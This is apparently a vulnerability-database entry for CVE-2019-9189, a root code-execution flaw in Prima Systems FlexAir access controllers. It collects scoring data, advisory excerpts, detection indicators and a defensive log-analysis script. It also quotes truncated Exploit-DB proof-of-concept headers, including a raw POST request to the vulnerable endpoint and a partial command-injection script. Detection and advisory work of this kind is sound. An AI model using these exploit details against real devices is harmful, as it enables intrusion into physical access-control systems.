CVE-2019-9189
Published: 2019-06-05
Priority P271 · high · 8.8 (CVSS 3.0)
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 11.63% (95.5th percentile)
Prima Systems FlexAir, Versions 2.4.9api3 and prior. The application allows the upload of arbitrary Python scripts when configuring the main central controller. These scripts are executed immediately and run as root rather than as the web server user, allowing an authenticated attacker to gain full system access.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| primasystems | flexair | <= 2.3.38 | — |
Detection & IOCs (extracted from sources)
- Monitor for HTTP POST requests to /bin/sysfcgi.fx, which is the vulnerable endpoint used to inject commands and upload arbitrary files on Prima/FlexAir devices.
- Alert on HTTP GET requests retrieving files from /app/images/logos/; attackers write command output or uploaded payloads to this web-accessible directory for exfiltration.
- Detect execution context of web-initiated processes running as root (uid=0); the exploit confirms code runs as root, not as the web server user.
- Flag uploads of Python scripts via the web interface to the central controller configuration, as the application executes them immediately with root privileges.
- Exploitation requires authentication; the attacker must have valid credentials before abusing the file upload/command injection functionality.
- The vulnerability affects Prima Systems FlexAir versions 2.4.9api3 and prior, as well as Prima Access Control 2.3.35; scope detection rules to these product versions.
- The device runs on an ARM (armv7l) Linux platform; host-based detection rules should account for this architecture.
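One way to apply the POST and GET indicators above to web access logs, as an added example that is not taken from the advisories or the vendor. It assumes Common Log Format lines from a proxy or sensor in front of the device, a 10-minute correlation window, and an image-extension allow-list for the logo directory; none of these come from the page.

```python
import re
from datetime import datetime, timedelta

API_ENDPOINT = "/bin/sysfcgi.fx"      # endpoint named in the notes above
DROP_DIR = "/app/images/logos/"       # web-accessible directory named above
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".svg")  # assumed allow-list
WINDOW = timedelta(minutes=10)        # assumed correlation window
# Assumption: the log source writes Common Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse(line):
    """Return (ip, time, method, path without query, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])

def detect(lines):
    """Return (severity, ip, path, reason) tuples in log order."""
    last_post = {}  # client ip -> time of its last POST to the endpoint
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path == API_ENDPOINT:
            last_post[ip] = ts
            alerts.append(("low", ip, path, "POST to sysfcgi.fx"))
        elif method == "GET" and path.startswith(DROP_DIR) and status == 200:
            odd = not path.lower().endswith(IMAGE_EXTS)
            recent = ip in last_post and timedelta(0) <= ts - last_post[ip] <= WINDOW
            if odd and recent:   # same client posted, then fetched a non-image
                alerts.append(("high", ip, path, "non-image fetch after POST"))
            elif odd:
                alerts.append(("medium", ip, path, "non-image file in logo dir"))
    return alerts

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [12/Nov/2019:10:00:01 +0000] "POST /bin/sysfcgi.fx HTTP/1.1" 200 112',
    '198.51.100.7 - - [12/Nov/2019:10:00:05 +0000] "GET /app/images/logos/out.txt HTTP/1.1" 200 64',
    '203.0.113.9 - - [12/Nov/2019:10:05:00 +0000] "GET /app/images/logos/logo.png HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Nov/2019:11:30:00 +0000] "GET /app/images/logos/x.py HTTP/1.1" 200 300',
]
```

Because exploitation requires authentication, pairing a high-severity hit with the account behind the session narrows triage to the credentials that need rotating.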
CVSS provenance
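| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |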
GHSA
GHSA-36c5-5h9q-3jvp: On Prima Systems FlexAir devices through 2
ghsa_unreviewed·2022-05-24
CVE-2019-9189 [HIGH] GHSA-36c5-5h9q-3jvp: On Prima Systems FlexAir devices through 2
On Prima Systems FlexAir devices through 2.4.9api3, an authenticated user can upload Python (.py) scripts and execute arbitrary code with root privileges.
CISA ICS
Prima Systems FlexAir
cisa_ics·2019-07-30·CVSS 7.2
[HIGH] Prima Systems FlexAir
ICS Advisory
## Prima Systems FlexAir
Last Revised: July 30, 2019
Alert Code: ICSA-19-211-02
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Prima Systems
- Equipment: FlexAir
- Vulnerabilities: OS Command Injection, Unrestricted Upload of File with Dangerous Type, Cross-site Request Forgery, Small Space of Random Values, Cross-site Scripting, Exposure of Backup file to Unauthorized Control Sphere, Improper Authentication, Use of Hard-coded Credentials
## 2. RISK EVALUATION
Exploitation of these vulnerabilities may allow an attacke
No detection rules found.
Exploit-DB
Prima Access Control 2.3.35 - Arbitrary File Upload
exploitdb·2019-11-12·CVSS 8.8
CVE-2019-9189 [HIGH] Prima Access Control 2.3.35 - Arbitrary File Upload
```
# Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC

POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 572
Origin: https://192.168.13.37
Session-ID: 5682699
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-w
```
Exploit-DB
FlexAir Access Control 2.4.9api3 - Remote Code Execution
exploitdb·2019-11-12·CVSS 8.8
CVE-2019-9189 [HIGH] FlexAir Access Control 2.4.9api3 - Remote Code Execution
```
# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.4.9api3
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# PoC
#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: ${OUTPUT_FILE}"
# Command injection payload. Be careful with single quotes!
PAYLOAD=""
# Perform exploit
echo "Executing: ${CMD}
```
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/155273/Prima-Access-Control-2.3.35-Script-Upload-Remote-Code-Execution.html
- https://applied-risk.com/index.php/download_file/view/199/165
- https://applied-risk.com/labs/advisories
- https://applied-risk.com/resources/ar-2019-007
- https://www.us-cert.gov/ics/advisories/icsa-19-211-02